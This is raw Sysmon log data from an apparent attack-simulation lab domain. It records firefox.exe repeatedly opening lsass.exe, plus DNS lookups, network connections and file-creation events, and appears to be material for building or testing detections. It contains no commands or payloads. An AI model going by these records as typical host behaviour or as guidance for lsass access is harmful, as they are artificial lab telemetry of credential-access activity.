Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288382Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.530{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288381Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.530{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288380Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.530{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288379Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.530{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288378Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.530{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288377Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.530{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288376Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.526{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x8000000000000000288375Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:30.506{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.11.163224852C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000216753Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:30.295{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=2429D019570EA1580080B589C9F3757D,SHA256=445220912F635E828623A19F180EBFE30B8245B3628DD226ECE52DE8F43024AB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216752Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:28.566{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51349-false10.0.1.12-8000- 23542300x8000000000000000216755Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:31.561{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B3510B8857A6C1F13DBC4288370070E,SHA256=171B90AD89B7983F859EB5C041E03A366B288DC3C6681D0E77E75064FD50C8D6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288461Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.322{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local51336-false142.250.186.162fra24s08-in-f2.1e100.net443https 354300x8000000000000000288460Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.320{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local58203- 354300x8000000000000000288459Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.320{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local56479- 354300x8000000000000000288458Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.318{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local51335- 354300x8000000000000000288457Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.238{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local55187- 354300x8000000000000000288456Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.238{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local51771-false142.250.185.238fra16s53-in-f14.1e100.net443https 354300x8000000000000000288455Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.238{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local55032- 354300x8000000000000000288454Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.235{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local51770- 10341000x8000000000000000288453Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:31.786{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000288452Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:31.717{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DD368A8E670B6697321BC0336388F90,SHA256=3A6608805347B256C690F63EE466D71AE4AF2F98A0D17B5B1E231C737148D8F6,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000288451Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.413{C8EA50B7-11AA-6216-1605-000000003802}2228adservice.google.de0type: 5 pagead46.l.doubleclick.net;::ffff:142.250.184.226;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288450Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.253{C8EA50B7-11AA-6216-1605-000000003802}2228plus.l.google.com02a00:1450:4001:810::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288449Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.251{C8EA50B7-11AA-6216-1605-000000003802}2228plus.l.google.com0142.250.185.238;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288448Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.250{C8EA50B7-11AA-6216-1605-000000003802}2228apis.google.com0type: 5 plus.l.google.com;::ffff:142.250.185.238;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288447Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:29.124{C8EA50B7-11AA-6216-1605-000000003802}2228gstaticadssl.l.google.com02a00:1450:4001:829::2003;C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000288446Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:31.376{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.13.75360441C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288445Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:31.353{C8EA50B7-11AA-6216-1605-000000003802}22286132C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AE-6216-1A05-000000003802}3544C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2bd60|C:\Program Files\Mozilla Firefox\xul.dll+e38a9d|C:\Program Files\Mozilla Firefox\xul.dll+e38528|C:\Program Files\Mozilla Firefox\xul.dll+840734|C:\Program Files\Mozilla Firefox\xul.dll+834311|C:\Program Files\Mozilla Firefox\xul.dll+19c76f6|C:\Program Files\Mozilla Firefox\xul.dll+168da29|C:\Program Files\Mozilla Firefox\xul.dll+19ee82f|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+249ae|C:\Program Files\Mozilla Firefox\xul.dll+18db08|C:\Program Files\Mozilla Firefox\xul.dll+18ca0f|C:\Program Files\Mozilla Firefox\xul.dll+43f0b91|C:\Program Files\Mozilla Firefox\xul.dll+445b03b|C:\Program Files\Mozilla Firefox\xul.dll+445be29|C:\Program Files\Mozilla Firefox\xul.dll+1f9ac83|C:\Program Files\Mozilla Firefox\firefox.exe+9dd0|C:\Program Files\Mozilla Firefox\firefox.exe+1ca08|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288444Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:31.348{C8EA50B7-11AA-6216-1605-000000003802}22286132C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2bd60|C:\Program Files\Mozilla Firefox\xul.dll+e38a9d|C:\Program Files\Mozilla Firefox\xul.dll+e32cb9|C:\Program Files\Mozilla Firefox\xul.dll+e336a8|C:\Program Files\Mozilla Firefox\xul.dll+e21a18|C:\Program Files\Mozilla Firefox\xul.dll+4228d84|C:\Program Files\Mozilla Firefox\xul.dll+2443950|C:\Program Files\Mozilla Firefox\xul.dll+977c4a|C:\Program Files\Mozilla Firefox\xul.dll+93b2a1|C:\Program Files\Mozilla Firefox\xul.dll+18e1fd|C:\Program Files\Mozilla Firefox\xul.dll+97b107|C:\Program Files\Mozilla Firefox\xul.dll+94421e|C:\Program Files\Mozilla Firefox\xul.dll+946ef1|C:\Program Files\Mozilla Firefox\xul.dll+945cce|C:\Program Files\Mozilla Firefox\xul.dll+945051|C:\Program Files\Mozilla Firefox\xul.dll+94f179|C:\Program Files\Mozilla Firefox\xul.dll+890b1a|C:\Program Files\Mozilla Firefox\xul.dll+825fe7|C:\Program Files\Mozilla Firefox\xul.dll+19c76f6|C:\Program Files\Mozilla Firefox\xul.dll+168da29|C:\Program Files\Mozilla Firefox\xul.dll+19ee82f|C:\Program Files\Mozilla Firefox\xul.dll+9850af 23542300x8000000000000000288443Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:31.172{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\permissions.sqlite-journalMD5=E18C86A3C93F7F80E886E1CA389CBB9D,SHA256=D5B9F736AF79CF195B8F7B0B3711EE02E14D7070BA1F1711031B81F591764536,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288545Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:31.253{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local51164- 354300x8000000000000000288544Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:31.253{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local61945- 354300x8000000000000000288543Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:31.252{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local57651- 354300x8000000000000000288542Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:31.251{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local58316- 23542300x8000000000000000288541Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.805{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=264FFA4929E6A81654F52E0C221F6E25,SHA256=85369A5F582B3C335FFC82582F7564CEEC59C3934925FFDDE12E39F0A3688E78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216756Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:32.577{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD19E78C82B478DBC7210EDAD6504EF4,SHA256=2B3D48E1C087F355A25EAD29652C36E7814EF21464DAD8E092F1490F543E4884,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000288540Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:31.137{C8EA50B7-11AA-6216-1605-000000003802}2228procmon.9002-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288539Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.944{C8EA50B7-11AA-6216-1605-000000003802}2228js.monitor.azure.com0type: 5 aijscdn2.azureedge.net;type: 5 aijscdn2.afd.azureedge.net;type: 5 firstparty-azurefd-prod.trafficmanager.net;type: 5 dual.part-0017.t-0009.t-msedge.net;type: 5 part-0017.t-0009.t-msedge.net;::ffff:13.107.246.45;::ffff:13.107.213.45;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288538Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.942{C8EA50B7-11AA-6216-1605-000000003802}2228part-0017.t-0009.t-msedge.net02620:1ec:bdf::45;2620:1ec:46::45;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288537Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.939{C8EA50B7-11AA-6216-1605-000000003802}2228part-0017.t-0009.t-msedge.net013.107.213.45;13.107.246.45;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288536Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.785{C8EA50B7-11AA-6216-1605-000000003802}2228api.globalsign.cloud02606:4700::6812:19f3;2606:4700::6812:18f3;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288535Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.784{C8EA50B7-11AA-6216-1605-000000003802}2228api.globalsign.cloud0104.18.24.243;104.18.25.243;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288534Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.754{C8EA50B7-11AA-6216-1605-000000003802}2228e13630.dscb.akamaiedge.net02a02:26f0:1700:1b0::353e;2a02:26f0:1700:195::353e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288533Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.751{C8EA50B7-11AA-6216-1605-000000003802}2228e13630.dscb.akamaiedge.net0104.111.246.93;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000288532Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:32.769{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB74834F595AF690217665DD25839A1E,SHA256=0D5C9D667BB5C182DA264DE7F0968D89AE8A8C8516637F5EF4C35C92443A3CB3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288531Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.933{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53479-false13.107.246.45-443https 354300x8000000000000000288530Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.927{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53478-false13.107.246.45-443https 354300x8000000000000000288529Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.927{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local59550- 